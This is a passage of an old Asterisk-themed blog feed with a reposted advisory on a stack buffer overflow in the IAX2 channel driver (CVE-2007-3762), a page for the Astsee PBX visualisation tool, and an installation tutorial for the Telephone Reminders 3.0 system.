rgb(255, 255, 255);"&gt; Details&lt;/td&gt;       &lt;/tr&gt;       &lt;tr align="left"&gt;        &lt;td&gt;      &lt;div style="border: 1px solid rgb(153, 153, 153); padding: 1em; float: right; width: 300px; height: 4em; margin-left: 1em; margin-bottom: 1em; text-align: center;"&gt;&lt;a href="http://www.securiteam.com/avds20070503"&gt;What if you could scan your network for all the vulnerabilities on SecuriTeam.com, automatically, every day?&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;      &lt;b&gt;Vulnerable Systems:&lt;/b&gt;&lt;br /&gt; * Asterisk Open Source versions prior to 1.2.22&lt;br /&gt; * Asterisk Open Source versions prior to 1.4.8&lt;br /&gt; * Asterisk Business Edition versions prior to B.2.2.1&lt;br /&gt; * AsteriskNOW prerelease versions prior to beta7&lt;br /&gt; * Asterisk Appliance Developer Kit versions prior to 0.5.0&lt;br /&gt; * s800i (Asterisk Appliance) versions prior to 1.0.2&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Immune Systems:&lt;/b&gt;&lt;br /&gt; * Asterisk Open Source version 1.2.22&lt;br /&gt; * Asterisk Open Source version 1.4.8&lt;br /&gt; * Asterisk Business Edition B.2.2.1&lt;br /&gt; * AsteriskNOW Beta7&lt;br /&gt; * Asterisk Appliance Developer Kit version 0.5.0&lt;br /&gt; * s800i (Asterisk Appliance) version 1.0.2&lt;br /&gt;&lt;br /&gt;The specific conditions that trigger the vulnerability are the following:&lt;br /&gt; * iax2_write() is called with a frame with the following properties a voice or video frame&lt;br /&gt; * Its 4-byte timestamp has the same high 2 bytes as the previous frame that was sent&lt;br /&gt; * Its format is the one currently expected&lt;br /&gt; * Its data payload is larger than 4 kB&lt;br /&gt;&lt;br /&gt;iax2_write() calls iax2_send() to send the frame. Inside of iax2_send(), there is a conditional check to determine whether the frame should be sent immediately (the now variable) or queued for transmission later.&lt;br /&gt;&lt;br /&gt;If the frame is going to be transmitted later, an iax_frame struct is dynamically allocated with a data buffer that has the exact buffer size needed to accommodate for the provided ast_frame data. However, if the frame is being sent immediately, it uses a stack allocated iax_frame, with a data buffer size of 4096 bytes. Later, the iax_frame_wrap() function is used to copy the data from the ast_frame struct into the iax_frame struct. This function assumes the iax_frame data buffer has enough space for all of the data in the ast_frame.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Resolution:&lt;/b&gt;&lt;br /&gt;This issue is only exploitable when the system is configured in such a way that calls between channels that use RTP and IAX2 channels are possible. Also, some additional protection against arbitrary code execution is provided if the call involves transcoding between audio formats as this will change the contents of the frame payload.&lt;br /&gt;&lt;br /&gt;All users that have systems that connect calls between channels that use RTP and IAX2 channels should immediately update to versions listed in the corrected in section of this advisory.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CVE Information:&lt;/b&gt;&lt;br /&gt;&lt;a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3762"&gt;CVE-2007-3762&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-6197170141333437181?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/6197170141333437181/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=6197170141333437181' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6197170141333437181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/6197170141333437181'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/stack-buffer-overflow-in-asterisks-iax2.html' title='Stack Buffer Overflow in Asterisk&apos;s IAX2 Channel Driver'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4161773233153899080</id><published>2007-09-17T14:45:00.001-07:00</published><updated>2007-09-17T14:45:55.745-07:00</updated><title type='text'>Astsee</title><content type='html'>&lt;center&gt;&lt;h1&gt;Astsee&lt;/h1&gt; &lt;h3&gt;A [fun] pbx usage auditing tool&lt;/h3&gt; &lt;b&gt;Screenshots&lt;/b&gt; (click for bigger)&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;&lt;tbody&gt;&lt;tr&gt; &lt;td&gt;&lt;center&gt;&lt;a href="http://www.astsee.com/astsee-0.1.png" target="_blank"&gt;&lt;img src="http://www.astsee.com/astsee-0.1.png" border="0" height="150" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;small&gt;version 0.1&lt;/small&gt;&lt;/center&gt;&lt;/td&gt; &lt;td&gt;&lt;center&gt;&lt;a href="http://www.astsee.com/astsee-0.4.png" target="_blank"&gt;&lt;img src="http://www.astsee.com/astsee-0.4.png" border="0" height="150" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;small&gt;version 0.4&lt;/small&gt;&lt;/center&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt; &lt;script type="text/javascript"&gt;&lt;!-- google_ad_client = "pub-3558884800641084"; google_ad_width = 728; google_ad_height = 90; google_ad_format = "728x90_as"; google_ad_type = "text_image"; google_ad_channel = ""; //--&gt; &lt;/script&gt; &lt;script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"&gt; &lt;/script&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt; &lt;b&gt;Overview&lt;/b&gt;&lt;br /&gt;Astsee is a fun, graphical way to see what's going on in your asterisk server.  Upon first startup the layout is  empty, but it connects to your asterisk server's manager interface to receive notifications of new channels and links. As channels are detected, they are added to the layout.  As links are made and broken, animated lightning graphically  shows the bridge between the pertinent channels.&lt;br /&gt;&lt;br /&gt;This is pre-release software.  Proceed at your own risk.  Don't hurt your goldfish.  If you do, I'm not replacing it.&lt;br /&gt;&lt;br /&gt;What works:&lt;br /&gt;&lt;ul&gt;&lt;li&gt; SIP, Zap, and IAX[2] channels are added to the layout when asterisk mentions them   &lt;/li&gt;&lt;li&gt; Bridges between channels are drawn graphically   &lt;/li&gt;&lt;li&gt; Nodes are arranged prettily in a circle (But press 'R' to randomize their positions)   &lt;/li&gt;&lt;li&gt; The CallerID info is available by hovering the mouse over the nodes   &lt;/li&gt;&lt;li&gt; Transferring a call seems to mostly work, including parking a call and retrieving it from the same or any other location. &lt;/li&gt;&lt;/ul&gt; What doesn't work but I would like to implement eventually:&lt;br /&gt;&lt;ul&gt;&lt;li&gt; You can't delete nodes from the layout   &lt;/li&gt;&lt;li&gt; You can't specify a filter of techs/channels to ignore   &lt;/li&gt;&lt;li&gt; Meetme rooms aren't handled, but create superfluous node "Zap/pseudo"   &lt;/li&gt;&lt;li&gt; Echo chamber results in a superfluous node with tech "SIP" and channel "SIP"   &lt;/li&gt;&lt;li&gt; You can't destroy bridges (drop the call)   &lt;/li&gt;&lt;li&gt; You can't drag and drop the terminii of the bridges to transfer a call   &lt;/li&gt;&lt;li&gt; You can't disable animations for slower computers   &lt;/li&gt;&lt;li&gt; Various media players and resource-intensive virtual guests cause Astsee to behave at a snail's pace   &lt;/li&gt;&lt;li&gt; You can't configure the colors or graphics (you can replace the 64x64 node_gfx.tga with your own if you want)   &lt;/li&gt;&lt;li&gt; If you mis-specify the manager username/secret, Astsee will simply crash :(   &lt;/li&gt;&lt;li&gt; Nodes exist in perpetuity once detected. I would like to option for them to time out after a set time, or at least fade away a bit &lt;/li&gt;&lt;li&gt; The mouse leaves droppings   &lt;/li&gt;&lt;li&gt; This one is my favorite.  I'll surprise you later.  I'm really excited about it. &lt;span style="color:red;"&gt;Traces of this hint can be found in version 0.5!&lt;/span&gt; &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;Again, &lt;b&gt;ALPHA&lt;/b&gt; software.   It runs in windowed mode, 800x600, 16bpp. It requires socat.  'apt-get install socat' for that,  if on ubuntu or debian. If not on ubuntu, or these instructions don't work for your debianish distribution,  you can try  &lt;a href="http://www.dest-unreach.org/socat/"&gt;socat&lt;/a&gt;.  I linked in static versions of allegro into my binaries so you wouldn't have to have allegro even installed.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Download&lt;/b&gt;&lt;br /&gt; • Linux i386 ELF binary version 0.5 - &lt;span style="color:red;"&gt;&lt;small&gt;NEW! The not-afraid-to-show-your-dad version! But can you find the secret?&lt;/small&gt;&lt;/span&gt; &lt;a href="http://www.astsee.com/astsee-0.5.tgz"&gt;astsee-0.5.tgz&lt;/a&gt;&lt;br /&gt; • Linux i386 ELF binary version 0.4 - &lt;span style="color:red;"&gt;&lt;small&gt;Things kinda work!&lt;/small&gt;&lt;/span&gt; &lt;a href="http://www.astsee.com/astsee-0.4.tgz"&gt;astsee-0.4.tgz&lt;/a&gt;&lt;br /&gt; • Linux i386 ELF binary version 0.2 - &lt;span style="color:red;"&gt;&lt;small&gt;Shoddy mouse support!&lt;/small&gt;&lt;/span&gt; &lt;a href="http://www.astsee.com/astsee-0.2.tgz"&gt;astsee-0.2.tgz&lt;/a&gt;&lt;br /&gt; • Linux i386 ELF binary version 0.1 - &lt;a href="http://www.astsee.com/astsee-0.1.tgz"&gt;astsee-0.1.tgz&lt;/a&gt;&lt;br /&gt; • Source now available.  Innovate!  &lt;a href="http://www.astsee.com/source"&gt;Source code packages&lt;/a&gt;   If it doesn't run on your machine, tell me what it DOES do and I'll see if I can make it work for you.&lt;br /&gt; • Sorry, a Windows version is not possible right now because I can't find socat available for Windows.&lt;br /&gt;&lt;br /&gt; &lt;b&gt;Usage&lt;/b&gt;&lt;br /&gt;$ ./astsee host/ip port username secret&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;$ ./astsee 10.0.0.252 5038 mojo *****&lt;br /&gt;&lt;br /&gt;Of course, this is the manager username/secret configured in asterisk's manager.conf.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5347199699038004890-4161773233153899080?l=asteriskelite.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://asteriskelite.blogspot.com/feeds/4161773233153899080/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5347199699038004890&amp;postID=4161773233153899080' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4161773233153899080'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5347199699038004890/posts/default/4161773233153899080'/><link rel='alternate' type='text/html' href='http://asteriskelite.blogspot.com/2007/09/astsee.html' title='Astsee'/><author><name>Elite Linux</name><uri>http://www.blogger.com/profile/03219986332472835680</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5347199699038004890.post-4442403007703907145</id><published>2007-09-17T14:41:00.000-07:00</published><updated>2007-09-17T14:42:10.849-07:00</updated><title type='text'>Introducing Telephone Reminders 3.0: The Free Asterisk Telephone Reminder System</title><content type='html'>&lt;h3 class="storytitle" id="post-180"&gt;&lt;a href="http://nerdvittles.com/index.php?p=180" rel="bookmark" title="Permanent Link: Introducing Telephone Reminders 3.0: The Free Asterisk Telephone Reminder System"&gt;Tomado de http://nerdvittles.com/index.php?p=180&lt;br /&gt;&lt;/a&gt;&lt;/h3&gt;  &lt;div class="meta"&gt;Filed under: &lt;ul class="post-categories"&gt;&lt;li&gt;&lt;a href="http://nerdvittles.com/index.php?cat=2" title="View all posts in Technology"&gt;Technology&lt;/a&gt;&lt;/li&gt;&lt;li&gt;&lt;a href="http://nerdvittles.com/index.php?cat=3" title="View all posts in Telephony"&gt;Telephony&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt; — ward @ 1:00 am &lt;/div&gt;        &lt;p&gt;&lt;img src="http://nerdvittles.com/wp-images/reminder.gif" alt="" align="left" height="317" hspace="9" width="250" /&gt;It's free software day again at Nerd Vittles, and today we're updating our Telephone Reminder System for Asterisk to version 3. The original system let you schedule reminders for future events and, when the appointed date and time arrived, Asterisk swung into action and placed a call to the number you designated to deliver your customized reminder message. Today we add the bells and whistles that just about everyone using the original application requested. Now you can set up recurring reminders that call daily or on weekdays as well as weekly, monthly, and annually. This means it can be used to wake you up in the morning, or to remind Granny to take her medicine every day, or to remind your Little League team of practice times and locations, or to remind you and your customers of scheduled and recurring events. &lt;/p&gt;  &lt;p&gt;The smarts for the original system already have been incorporated into our &lt;a href="http://nerdvittles.com/index.php?p=113"&gt;TeleYapper 2.5 Voice Messaging System&lt;/a&gt;. But that's a real-time system meaning it begins calling immediately after you choose a group of people to call. This phone reminder system is different in that you can schedule the calls for the near or distant future, you can specify different numbers for the calls, and you can customize the recorded messages for each call. In short, it's perfect for appointment reminders, birthday reminders, anniversary reminders, and anything else you want to remember. All it takes is a phone call to set up each reminder. There's no web page to fill in and no database required to manage the reminders. You can schedule as many reminders per phone number as your little fingers care to dial! And, in our next article, we'll show you how to use a single entry from the new Asterisk Telephone Reminder System to contact a small or large group of people on a recurring basis. &lt;/p&gt;  &lt;p&gt;&lt;b&gt;Prerequisites.&lt;/b&gt; We've tested version 3 of our appointment reminder system with ISO-installed versions of Asterisk@Home 2.5 and TrixBox 1.2.3 in addition to the Nerd Vittles VMware builds of TrixBox 1.2.3. If you wish to use it with later versions of TrixBox or with a "pure Asterisk" system (not 1.4!), then you shouldn't have any problems. It won't work with version 1.x of Asterisk@Home or 1.4 releases of Asterisk. Post a comment if you have problems. You also will need a system which includes PHP to run this application. We've tested it with PHP 4.3.9, but PHP 5 systems probably will function without many changes in the underlying code. You should be able to install this project and get everything working in under 30 minutes. For those using our VMware TrixBox builds or our Linux PBX-in-a-Flash script for TrixBox 1.2.3 which can be downloaded at the top of this page, we'll walk you through the 5-minute upgrade drill so that you can take advantage of the new Version 3 recurring reminders feature set. If you're installing Telephone Reminders for the first time, complete installation instructions are available on our &lt;a href="http://bestof.nerdvittles.com/applications/reminders/"&gt;Best of Nerd Vittles&lt;/a&gt; site.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;How It Works.&lt;/b&gt; The reminder system is actually quite simple to use. You dial extension 1-2-3 on your Asterisk system, enter your password, and then you'll be prompted to record a reminder message. Next you enter the phone number, date, and time for delivery of the reminder message. Finally, you're prompted whether to schedule a single reminder or recurring reminders (weekdays, daily, weekly, monthly, or annually). When the appointed date and time arrives, Asterisk will place the call to the number you specified using your default dialing rules and will play the customized reminder when the call is answered. If the call is not answered, the call will be repeated n number of times with a delay between calls of x minutes before giving up on the call. You'll get an email with the call reminder setup if desired. You also get to configure the number of retries and the delay between calls. Finally, end of the month recurring reminders pose a special problem. Why? Because not all months end on the same numbered day. January has 31, February has 28, April has 30. You get the idea. So the default behavior is as follows, If you schedule monthly reminders on the last day of any month, then we assume you want the reminders delivered on the last day of every month. You can alter this behavior by setting a flag in the reminder.php script if you want monthly reminders to always be delivered on the 28th day of the month, for example.&lt;/p&gt;  &lt;p&gt;Finally, a word about failed calls. Reminders are important to most folks, or you wouldn't be scheduling them. So failed calls are problematic. On the one hand, you don't want to overburden your phone system placing thousands of reminder calls just because the calls continue to fail. You may have entered an incorrect phone number, for example. So our middle-of-the-road solution to failed calls is this. You can tell the system how many times to repeat the call and how much time to eat up between attempts. If the call still fails, non-recurring reminders will be deleted from the system. But the reminder message is preserved as well as the recurring reminder for the next date on which to place the call. If you look in /var/lib/asterisk/sounds/custom on your system, you will see some custom sound files (such as the reminder prompts which all begin with reminder). In addition, you will see the actual reminder messages for each of your reminders. The naming convention is HourMinute.Date.PhoneNumber.gsm. If you see entries in this directory with dates before today's date, those are failed call reminders. You can play the sound files on most computers by simply double-clicking on the files. You can delete old reminders for a specific date while logged in as root on your Asterisk system with a command like this:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;&lt;i&gt;rm -f /var/lib/asterisk/sounds/custom/*.20060123.*.gsm&lt;/i&gt;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;&lt;b&gt;&lt;i&gt;Be sure you don't delete today's reminder messages or messages with a future date, or your entire reminder system will be toast!&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p&gt;Here are the components that make up the complete system:&lt;/p&gt;  &lt;div class="storycontent"&gt;&lt;li&gt;AutoAttendant Contexts to Create Reminders&lt;/li&gt;  &lt;li&gt;Code Snippet to Answer 1-2-3 Calls&lt;/li&gt;  &lt;li&gt;Allison Voice Prompts for Telephone Reminder 3.0 IVR Interface&lt;/li&gt;  &lt;li&gt;checkdate.php AGI script to Check for Dates in the Past&lt;/li&gt;  &lt;li&gt;checktime.php AGI script to Check for Times in the Past&lt;/li&gt;  &lt;li&gt;reminder.php AGI script to Schedule Calls&lt;/li&gt;  &lt;li&gt;Reminder Call Processing Contexts&lt;/li&gt;  &lt;li&gt;run_reminders script to Check for Today's Reminders&lt;/li&gt;  &lt;li&gt;run_recurring script to Reschedule Recurring Reminders Due Today&lt;/li&gt;  &lt;p&gt;&lt;b&gt;Limitations.&lt;/b&gt; There are a few limitations you need to be aware of. First, you can't schedule delivery of a reminder within the first 5 minutes after midnight each night. That's when the reminder system does its housekeeping. Second, you must schedule reminders at least 5 minutes after you place your call to set up the reminder. This gives the system ample time to generate the configuration files it needs and to put them in the right places. Third, the current reminder system does not fully support simultaneous scheduling of multiple reminders. The current system uses unique names to identify sound files generated by multiple simultaneous callers. However, it still is theoretically possible for two different callers to schedule two reminders for the same phone number and the same reminder time and to do so at the exact same time. This would cause one of the reminders to be discarded. We just wanted to alert you to this remote possibility. But we hasten to add that the chance of this happening is pretty small even in a very large Asterisk system with hundreds of users. &lt;/p&gt;  &lt;p&gt;&lt;b&gt;License.&lt;/b&gt;  This software is licensed for your use under a &lt;b&gt;&lt;i&gt;Creative Commons Attribution-ShareAlike 2.5 license&lt;/i&gt;&lt;/b&gt;. Before using this software, please read the terms of the &lt;a href="http://creativecommons.org/licenses/by-sa/2.5/legalcode"&gt;license&lt;/a&gt;. A Plain English version of the license is available &lt;a href="http://creativecommons.org/licenses/by-sa/2.5/"&gt;here&lt;/a&gt;. You may not charge a fee for something we are giving you for free. Finally, we ask that you preserve our copyright notice in any copies of the software you make. The same applies to derivative works. If you do not accept the terms of the license, do not use the software. Even if you accept the terms of the license, keep in mind that &lt;b&gt;BY USING THIS SOFTWARE, YOU ASSUME ALL RISKS OF USE AND NO WARRANTIES EXPRESS OR IMPLIED ARE PROVIDED WITH THIS FREE SOFTWARE INCLUDING FITNESS FOR A PARTICULAR USE AND MERCHANTABILITY&lt;/b&gt;. In short, it's up to you to determine, at your own risk, whether this software meets your needs. Don't assume that it will, and don't assume that the code is error-free. It's probably not.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;The Game Plan.&lt;/b&gt; In today's article, we're going to walk you through upgrading a system on which you already have installed an earlier version of our Telephone Reminders system. As mentioned, if you're installing the software for the first time, stop here and use our &lt;a href="http://bestof.nerdvittles.com/applications/reminders/"&gt;Best of Nerd Vittles tutorial&lt;/a&gt;. To get the Reminder System upgraded, we're first going to move all of the code into the proper places. This includes the modifications to the dialplan contexts, installation of a new Allison voice prompts, and installation of the upgraded PHP/AGI scripts. Then we'll walk you through configuring the system. And finally we'll schedule a reminder to make sure everything went according to plan.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Modifying Your Dialplan.&lt;/b&gt;  Step #1 is to replace some code that's already in your dialplan. The original contexts in extensions_custom.conf looked like &lt;a href="http://nerdvittles.com/aah2/reminder25.txt"&gt;this&lt;/a&gt;. Find ALL of this code (toward the bottom of the extensions_custom.conf file or, for TrixBox systems, extensions_trixbox.conf in the /etc/asterisk directory on your system) and delete it. The contexts to delete are the following: reminder, reminder2, reminder3, reminder4, reminder5, reminder6, reminder7, reminder8, reminder9, remindem, and remindem2. Replace the deleted contexts with this &lt;a href="http://nerdvittles.com/aah2/reminder30.txt"&gt;version 3.0 code&lt;/a&gt;. &lt;/p&gt;  &lt;p&gt;For Step #2, make sure the following code snippet is still located in the top section of extensions_custom.conf in the [from-internal-custom] context or, for TrixBox systems, extensions_trixbox.conf in the [from-internal-trixbox] context:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;exten =&gt; 123,1,Answer&lt;br /&gt;exten =&gt; 123,2,Wait(1)&lt;br /&gt;exten =&gt; 123,3,Authenticate(12345678)&lt;br /&gt;exten =&gt; 123,4,Goto(reminder,s,1)&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;If, for some reason, you already are using extension 1-2-3 on your Asterisk system for some other purpose, then simply adjust the 123 extension in the four lines above to another number that works on your system. This is the number you will dial to schedule reminders. Line 3 is important as well. This is where you set a password for scheduling reminders on your system. Anyone that knows the password can schedule reminders. Simply replace 12345678 with a password that's secure enough for you to sleep well.&lt;/p&gt;  &lt;p&gt;Finally, a head's up. When you do the cut-and-paste, double-check the long lines of code such as h,1 in [reminder9] and be sure all of the text ends up on a single line. Otherwise, things won't work correctly. Once you've added the two sections of code above, save your new config file and reload Asterisk.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Installing Reminder Voice Prompts.&lt;/b&gt; These voice prompts are free for the taking subject to the terms of the license agreement, and they're all the same as version 2.5 except there is a new reminder6.gsm. Just log into your Asterisk server as root and enter the following command to install the new voice prompt:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;cd /var/lib/asterisk/sounds/custom&lt;br /&gt;wget http://nerdvittles.com/aah2/reminder6.gsm&lt;br /&gt;chmod 664 reminder*.gsm&lt;br /&gt;chown asterisk:asterisk reminder*.gsm&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;If you need all of the voice prompts, then use these commands instead:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;cd /var/lib/asterisk/sounds/custom&lt;br /&gt;wget http://nerdvittles.com/aah2/nv-reminder3_voice.zip&lt;br /&gt;unzip nv-reminder3_voice.zip  (be sure to overwrite existing files!)&lt;br /&gt;chmod 664 reminder*.gsm&lt;br /&gt;chown asterisk:asterisk reminder*.gsm&lt;br /&gt;rm -f nv-reminder3_voice.zip&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Installing the Reminder PHP/AGI Scripts.&lt;/b&gt; Now we're getting to the new code for version 3. While you're still logged in as root, let's install the final pieces of code that you'll need to get things working. Just execute the commands below:&lt;br /&gt;&lt;code&gt;&lt;br /&gt;cd /var/lib/asterisk/agi-bin&lt;br /&gt;mv reminder.php reminder25.php&lt;br /&gt;mv run_reminders run_reminders.25&lt;br /&gt;mv checkdate.php checkdate25.php&lt;br /&gt;mv checktime.php checktime25.php&lt;br /&gt;wget http://nerdvittles.com/aah2/nv-reminder3.zip&lt;br /&gt;unzip nv-reminder3.zip&lt;br /&gt;chmod 775 reminder.php&lt;br /&gt;chown asterisk:asterisk reminder.php&lt;br /&gt;chmod 775 check*.php&lt;br /&gt;chown asterisk:asterisk check*.php&lt;br /&gt;chmod 777 run_reminders&lt;br /&gt;chown asterisk:asterisk run_reminders&lt;br /&gt;chmod 777 run_recurring&lt;br /&gt;chown asterisk:asterisk run_recurring&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Creating Reminders Directories.&lt;/b&gt; While you're still logged in as root, create the following directories to store your reminders until the day arrives to execute them. Just issue the following commands. You should already have the reminders directory, but it won't hurt execute the command again just to be sure.&lt;br /&gt;&lt;code&gt;&lt;br /&gt;su asterisk&lt;br /&gt;cd /var/spool/asterisk&lt;br /&gt;mkdir reminders&lt;br /&gt;mkdir recurring&lt;br /&gt;exit&lt;br /&gt;&lt;/code&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Setting Up the Crontab Entries.&lt;/b&gt; Now we need to set up the cron jobs to actually move reminders and recurring reminders into the Asterisk call processing directory on the day they are scheduled to run. Be very careful here. If you already have a working Telephone Reminders system, then there will already be an entry for run_reminders. For the new system to work, you MUST adjust the time that the run_reminders script executes so that it occurs AFTER the run_recurring script each day. While logged in as root, edit the crontab file: &lt;i&gt;nano -w /etc/crontab&lt;/i&gt;. Be sure you typed the exit command in the last step, or you'll be logged in as asterisk instead of root. And you won't be able to edit the file! Now insert the following commands at the bottom of the crontab file and delete the existing run_reminders entry if you have one. Each command below should go on its own line.&lt;br /&gt;&lt;code&gt;&lt;br /&gt;0 0 * * * root /var/lib/asterisk/agi-bin/run_recurring  &gt;/dev/null 2&gt;&amp;amp;1&lt;br /&gt;3 0 * * * root /var/lib/asterisk/agi-bin/run_reminders &gt;/dev/null 2&gt;&amp;amp;1&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;Once you've added the two news lines and deleted the existing run_reminders line, save your changes: &lt;i&gt;Ctrl-X, Y, then press Enter&lt;/i&gt;. Whew! That's it for the Reminder code. Now let's configure the system, and you'll be all set.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Configuring the Reminder System.&lt;/b&gt; To configure the reminder system, you'll need to edit the reminder.php script while logged in as root: &lt;i&gt;nano -w /var/lib/asterisk/agi-bin/reminder.php&lt;/i&gt;. You'll notice a section of variables at the top of the file that looks like this:&lt;br /&gt;&lt;code&gt;&lt;br /&gt; $endofmonthflag=1 ;&lt;br /&gt; $extensionmaxdigits=4 ;&lt;br /&gt; $debug = 1;&lt;br /&gt; $newlogeachdebug = 1;&lt;br /&gt; $emaildebuglog = 0;&lt;br /&gt; $email = "yourname@yourdomain" ;&lt;br /&gt; $trunk = "local" ;&lt;br /&gt; $callerid = "6781234567" ;&lt;br /&gt; $numcallattempts=6 ;&lt;br /&gt; $calldelaybetweenruns=300 ;&lt;br /&gt; $timetoring=40 ;&lt;br /&gt; $acctcode= "Reminder" ;&lt;br /&gt;&lt;/code&gt;&lt;br /&gt;This is the only section of code you ought to mess with. When we update the code, we'll assume everything else has been left intact. Be very careful when editing this file. Don't remove any semicolons or quotation marks, or nothing will work! Here's a quick run-down on what each of the above variables does:&lt;/p&gt;  &lt;li&gt;&lt;b&gt;$endofmonthflag=1&lt;/b&gt; ... &lt;i&gt;Forces monthly recurring reminders scheduled on the last day of a month to the last day of every succeeding month&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt;$extensionmaxdigits=4&lt;/b&gt; ... &lt;i&gt;Sets the maximum number of digits for treating outbound calls as calls to local extensions.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $debug = 1&lt;/b&gt; ... &lt;i&gt;If set to 1, then a debug log is created in /var/log/asterisk/reminder.txt. Instructions for deleting reminders are in the log.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $newlogeachdebug = 1&lt;/b&gt; ... &lt;i&gt;If set to 1, then a new debug log is created each time a reminder is scheduled. Otherwise, file grows and grows.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $emaildebuglog = 0&lt;/b&gt; ... &lt;i&gt;If set to 1, the debug log is emailed to the email address set below when each reminder is scheduled.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $email = "yourname@yourdomain"&lt;/b&gt; ... &lt;i&gt;Enter your actual email address between the quotation marks. Only works if line above is set to 1.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $trunk = "local"&lt;/b&gt; ... &lt;i&gt;If set to "local", calls are routed using your default dialplan rules. Otherwise, specify a trunk to use, e.g. "sip/telasip-gw".&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $callerid = "6781234567"&lt;/b&gt; ... &lt;i&gt;Specify your caller ID number. Only used if $trunk is not set to "local" above.&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $numcallattempts=6&lt;/b&gt; ... &lt;i&gt;If there is no answer on the Reminder call, how many times should Asterisk attempt to deliver the reminder?&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $calldelaybetweenruns=300&lt;/b&gt; ... &lt;i&gt;How many seconds delay should there be between failed call attempts to deliver a reminder?&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $timetoring=40&lt;/b&gt; ... &lt;i&gt;How many seconds should the call ring when attempting to deliver a reminder?&lt;/i&gt;&lt;/li&gt;  &lt;li&gt;&lt;b&gt; $acctcode= "Reminder"&lt;/b&gt; ... &lt;i&gt;What accouting code should be used for reminder calls?&lt;/i&gt;&lt;/li&gt;  &lt;p&gt;Once you've configured the Reminder System to meet your needs, save your changes: &lt;i&gt;Ctrl-X, Y, then press Enter&lt;/i&gt;. HINT: You may want to start with the defaults which will work well for most folks.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Scheduling A Reminder.&lt;/b&gt; We're ready to take the Reminder System for a trial run at this juncture. Make sure you've reloaded your Asterisk system, and then dial 123 from an extension on your system. Enter the password you set up for your system and then press the pound key.&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Entering a Reminder Message.&lt;/b&gt; You'll first be prompted to record a reminder message. This is the message that will be played when someone answers the reminder call. If you're not scheduling this reminder for yourself, then the message ought to 